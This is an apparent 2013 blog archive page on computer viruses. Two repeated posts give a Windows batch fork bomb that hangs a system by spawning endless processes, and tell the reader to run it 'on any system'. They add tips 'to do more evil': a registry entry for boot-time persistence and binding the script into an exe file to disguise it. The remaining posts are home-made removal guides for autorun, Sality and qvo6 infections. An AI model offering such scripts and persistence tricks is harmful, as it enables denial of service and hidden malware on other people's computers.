Showing posts with label Computer Virus. Show all posts
Showing posts with label Computer Virus. Show all posts

Tuesday, 9 July 2013

Simple Virus to Hang the Windows System. Windows Shell Script :D

Step1: open CMD

Step 2: Write edit hack.bat

Step 3: Write following code

:A
start
goto A

Step 4: Save the file and Run this file on any system.

It will just hang your system by creating infinite processes. Like DOS attack on you system locally.

If you reboot directly then you system will be normal again.

To do more evil...
============
Make entry of this file in windows registry for boot time run..
You can also attach this program with any exe file with the use of exe binder program

:D

Friday, 5 July 2013

How to remove Autorun Virus from all Drives

First , How you will detect autorun virus is there??
Observations:
1)You can not enable to see hiden files in Folder Option
2)When you try to open any drive (i.e C:,D:,E:..) ,it does not open in same window. I mean,when you double click on any drive,it will open in another window
3)When you double click on drive, it does not open any give you some kind of message prompt.
4)When you double click on drive, it open a window, which normally open a window to select program by which you want to open it.(which comes when you have file with unknown extensions and when you double click on it,it ask you with which program you want to open this file. )
5)you see some shortcut with very weird name.(like qwDfg.pnf , TygDF.inl)


So very simple trick if you dont have any antivirus to fight.

Step 1:
Start you computer and don't click on any drive.

Step 2:
Open a winrar and try to explorer all your Drives.
You will notice some files common in each infected drive.
those are Autorun.inf or Autorun.ini and another is that weird shortcut file.
This files are only at C:\ ,D:\, E:\ .

Step 3:
Delete this two or other weird files from all drives.
Be careful when you do it with C drive because it already has some weird system files.

Step 4:
Don't do anything and just restart you system.

DONE!!!!

Tuesday, 2 July 2013

How to remove Win32.Sality virus

Hi,
Folks
When I was fighting with this virus at home, I wanted to find some good solution for it.(good means=effective+free)
Best thing a normal person can do is purchase antivirus and your work is done. But being an Engineer I want to find some another free solution.
There are so many tricks/solutions available on other sites but none of them worked with me. My safe mode was disabled and I was not able to start any antivirus software.

So I Found this tool of just 167 KB . This works fine and after starting tool , it just remove virus from every drive.
Click Here To Download Tool

Wednesday, 8 May 2013

how to remove qvo6 virus.

Step by step procedure to remove QVO6 virus.

I will make it as three phase process and very easy less than 15 minutes to complete it.






IE

1 - Open IE Explore
2 –Via “Tools->Internet Options”, Open “Internet Options” panel
3 – Click “General” tab
4 – Delete qvo6 homepage link and set a new homepage link
5 – Click “Settings” button in the “Search” area, open “Manage Add-ons” panel
6 – Remove qvo6, then close “Manage Add-ons” panel
7 – Click “Apply” or “OK” on “Internet Opens” panel to save the changes

Firefox

1 – Open Firefox explore
2 – Via “Firefox->Options->Options” open “Options” panel
3 - Click “General” tab
4 - Delete qvo6 homepage link and set a new homepage link
5 - Via “Firefox->Add-ons” open “Add-ons Manager” panel
6 – Click “Remove” button in the right of qvo6
7 – Choose “Manage Search Engines” in the search list
8 – Remove qvo6 , then click “OK”
9 – Restart Firefox explore

Chrome

1 - Open Chrome explore
2 – Click “Customize and control Google Chrome” in the right-top of the page
3 – Choose Settings ->click “Set pages” link -> delete qvo6 homepage link -> click “OK”
4 – Click “Manage search engines”->delete qvo6,then click “OK”
5 – Via “Customize and control Google Chrome->Tools->Extensions” open “Extensions” panel
6 – Remove “qvo6”
7 – Restart Chrome explore


Phase 2:
1) start menu--> Run---> Regedit 
2)search for the key word "qvo6"
3)when you find any entry , just edit it and write something else like "google" or "google.com"
4)do it till you remove/replace all entries concern with "qvo6"
Phase 3:
1)you need to modify all the shortcut properties for each browser(IE,chrome,Mozila)
2)open property of browser shortcut, check the field "Target". In this field , the location of original executable file of browser is given. now at the end of this file path, you will notice the link of "www.qvo6.com.....". just remove this link part. and leave reast as it is for all browser shortcut you use.

Leave comment if you find any difficulty. contact me at nishantgandhi99@gmail.com

Monday, 4 March 2013

Simple Virus to Hang the Windows System. Windows Shell Script :D

Simple Virus to Hang the Windows System. Windows Shell Script :D

Step1: open CMD

Step 2: Write edit hack.bat

Step 3: Write following code

:A
start
goto A

Step 4: Save the file and Run this file on any system.

It will just hang your system by creating infinite processes. Like DOS attack on you system locally.

If you reboot directly then you system will be normal again.

To do more evil...
============
Make entry of this file in windows registry for boot time run..

:D